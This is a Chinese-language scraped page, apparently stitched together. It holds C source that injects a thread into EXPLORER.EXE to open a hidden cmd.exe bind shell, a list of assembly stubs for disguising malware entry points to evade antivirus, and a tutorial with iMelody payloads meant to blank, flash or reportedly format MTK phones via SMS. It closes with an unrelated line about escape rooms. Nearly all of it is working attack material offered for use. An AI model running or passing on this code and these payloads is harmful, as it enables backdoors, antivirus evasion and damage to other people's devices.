Psend(clientSocket, Para->telnetmsg, 60, 0);if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用si.dwFlags =STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1;if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NUL L,NULL,&si,&ProcessInformatio n))return 0; while(1){ memset(Para->Buff,0,4096);PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRe ad,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1,Para->Buff, lBytesRead, &lBytesRead, 0))break;if(!Psend(clientSocket, Para->Buff, lBytesRead,0))break; }else { lBytesRead=Precv(clientSocket,Para->Buff, 4096, 0); if(lBytesRead <=0 ) break;if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead,&lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_ PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); // 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName("EXPLORER.EXE"); if(pID == 0)return 0; hRemoteProcess =OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存pRemoteThread =VirtualAllocEx(hRemoteProcess, 0, THREADSIZE,MEM_COMMIT |MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return 0; // 将线程执行体ThreadProc 写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary =(DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary =(DWORD)GetProcAddress(hKernel, "FreeLibrary"); myRemotePara.dwGetProcAddress =(DWORD)GetProcAddress(hKernel, "GetProcAddress"); myRemotePara.dwGetModuleHandle =(DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); myRemotePara.dwCreateProcessA =(DWORD)GetProcAddress(hKernel, "CreateProcessA"); myRemotePara.dwPeekNamedPipe =(DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); myRemotePara.dwWriteFile =(DWORD)GetProcAddress(hKernel, "WriteFile"); myRemotePara.dwReadFile =(DWORD)GetProcAddress(hKernel, "ReadFile"); myRemotePara.dwCloseHandle =(DWORD)GetProcAddress(hKernel, "CloseHandle"); myRemotePara.dwCreatePipe =(DWORD)GetProcAddress(hKernel, "CreatePipe"); myRemotePara.dwTerminateProcess =(DWORD)GetProcAddress(hKernel, "TerminateProcess"); hSock = LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup =(DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket =(DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons =(DWORD)GetProcAddress(hSock,"htons");myRemotePara.dwbind =(DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten =(DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept =(DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv =(DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend =(DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket =(DWORD)GetProcAddress(hSock,"closesocket"); hUser32 = LoadLibrary("user32.dll");myRemotePara.dwMessageBox =(DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0"); strcat(myRemotePara.winsockDll,"wsock32.dll\\0"); strcat(myRemotePara.cmd,"cmd.exe\\0");strcat(myRemotePara.telnetmsg,"ConnectSucessful!\\n\\0"); //写进目标进程pRemotePara=(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); if(!pRemotePara)return 0;if(!WriteProcessMemory(hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD(__stdcall *)(void*))pRemoteThread ,pRemotePara,0,&byte_write); while(1) {} FreeLibrary(hKernel); FreeLibrary(hSock); FreeLibrary(hUser32); CloseHandle(hRemoteProcess); CloseHandle(hToken); return 0; } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].L uid); tp.Privileges[0].Attributes = fEnable ?SE_PRIVILEGE_ENABLED:0;AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL, NULL); return((GetLastError() == ERROR_SUCCESS)); } DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap, &pe32)) { do{ if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0;if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle (hProcessSnap); return dwRet; 1.伪装vc++5.0 代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jmp 原入口地址*********************************************** ************************* 2.胡乱跳转代码:nop push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx loop somewhere /跳转到上面那段代码地址去!somewhere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址/在附近随意跳jmp ... /... jmp 原入口地址/跳到原始oep 90 55 8B EC 41 52 90 5A 49 5D 41 转储免杀*********************************************** ************************* 3.伪装c++代码:push ebp mov ebp,esp push -1 push 111111 push 222222 mov eax,fs:[0] push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 4.伪装Microsoft VisualC++ 6.0 代码:PUSH -1 PUSH 0 PUSH 0 MOVEAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP SUB ESP,68 PUSH EBX PUSH ESI PUSH EDI POP EAX POP EAX POP EAX ADD ESP,68 POP EAX MOV DWORD PTR FS:[0],EAX POP EAX POP EAX POP EAX POP EAX MOV EBP,EAX JMP 原入口地址push ebp mov ebp,esp jmp*********************************************** ************************* 5.伪装防杀精灵一号防杀代码:push ebp mov ebp,esp push -1 push 666666 push 888888 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 6.伪装防杀精灵二号防杀代码:push ebp mov ebp,esp push -1 push 0 push 0 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp sub esp,68 push ebx push esi push edi pop eax pop eax pop eax add esp,68 pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 7.伪装木马彩衣(无限复活袍)代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jo 原入口地址jno 原入口地址call 下一地址*********************************************** ************************* 8.伪装木马彩衣(虾米披风)代码:push ebp nop nop mov ebp,esp inc ecx nop push edx nop nop pop edx nop pop ebp inc ecx loop somewhere /跳转到下面那段代码地址去!someshere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址/在附近随意跳jmp ... /... jmp 原入口的地址/跳到原始oep 9.伪装花花添加器(神话)代码:-----------根据C++改nop nop nop mov ebp,esp push -1 push 111111 push 222222 mov eax,dword ptr fs:[0]push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax mov eax,原入口地址push eax retn*********************************************** ************************* 10.伪装花花添加器(无极)代码:nop mov ebp, esp push -1 push 0A2C2A push0D9038 mov eax, fs:[0] push eax mov fs:[0], esp pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址jmp eax*********************************************** ************************* 11.伪装花花添加器(金刚)代码:--------根据VC++5.0 改nop nop mov ebp, esp push -1 push 415448 push 4021A8 mov eax, fs:[0] push eax mov fs:[0], esp add esp, -6C push ebx push esi push edi add [eax], al mov eax,原入口地址jmp eax*********************************************** ************************* 12.伪装花花添加器(杀破浪)代码:nop mov ebp, esp push -1 push 0 push 0 mov eax, fs:[0] push eax mov fs:[0], esp sub esp, 68 push ebx push esi push edi pop eax pop eax pop eax add esp, 68 pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址jmp eax*********************************************** ************************* 12.伪装花花添加器(痴情大圣)代码:nop ..........省略N 行nop nop push ebp mov ebp, esp add esp, -0C add esp, 0C mov eax, 原入口地址push eax retn*********************************************** ************************* 13.伪装花花添加器(如果*爱)代码:nop ........省略N 行nop nop push ebp mov ebp, esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx mov eax, 原入口地址jmp eax*********************************************** ************************* 14.伪装PEtite 2.2 -> Ian Luck 代码:mov eax,0040E000 push 004153F3 push dword ptr fs:[0] mov dword ptr fs:[0],esp pushfw pushad push eax xor ebx,ebx pop eax popad popfw pop dword ptr fs:[0] pop eax jmp 原入口地址'执行到程序的原有OEP*********************************************** ************************* 15.无效PE 文件代码:push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx MOV DWORD PTR FS:[0],EAX \ POP EAX | POP EAX \ MOV DWORD PTR FS:[0],EAX |(注意了。
超详细图文短信病毒制作
超详细图文短信病毒制作这个短信病毒只对MTK平台的手机有效(有很多国产手机都是MTK平台),因为MTK平台是一种廉价的操作系统,一般形式为安卓(仿真安卓),所以制作出来的病毒不会对IOS、真安卓和微软手机操作系统有效,如造成了严重后果,自己负责。
这些病毒是利用IMY文件中的指令符而制作出来的,下面是制作过程(WIN7系统):在你想要的地方点击鼠标右键,选择“新建”,再选择“文本文档”然后点开文档输入病毒代码并保存(这只是其中一个,下面可以复制现成的)保存完以后就会像这样接着对着文件点击鼠标右键选择重命名把*.txt改成*.imy。
(*:代表命名,自己取名)改完后会显示这个点击“是”,之后文件就会像这样现在,恭喜你,已经成功制作了短信病毒,拿起手机(安卓手机)连接电脑把文件放入手机(自带内存)里的Audio文件里,切记手机里的Audio,然后通过短信(不是彩信)发送给MTK平台的手机,只要对方收到了并看了,就会出现病毒效果(已亲自试验过),如果你的手机就是MTK平台的,发送短信的时候先要开静音模式,系统全部声音设置都要关,然后才可以保证安全,如果你不清楚你的手机是不是MTK平台的,还是按照以上步骤做,以防万一,如果你收到了此类短信,解决方法还是如上图,如果中招了,那就拔电池吧!下面是病毒短信代码:(要对齐)1、格式化代码(后果自负)BEGIN:IMELODYVERSION:1.2FORMAT:CLASS1.0COMPOSER:MTK(23)FomatBEAT:180MELODY:backoffbackoffbackoffbackoffbackoffbackoffbackoffback offbackoff("<+Melody>+"@9999999999999999999999999)2、黑屏代码BEGIN:IMELODYBEAT:1200MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600) END:IMELODY3、闪屏代码BEGIN:IMELODYVERSION:1.2FORMAT:CLASS1.0BEAT:200MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200) END:IMELODY4、震动代码BEGIN:IMELODYVERSION:1.2FORMAT:CLASS1.0BEAT:100MELODY:(ledoffledonbackoffbackonvibeon@0)END:IMELODY既然如此,一般来说,带着这些问题,我们来审视一下密室逃脱好玩吗。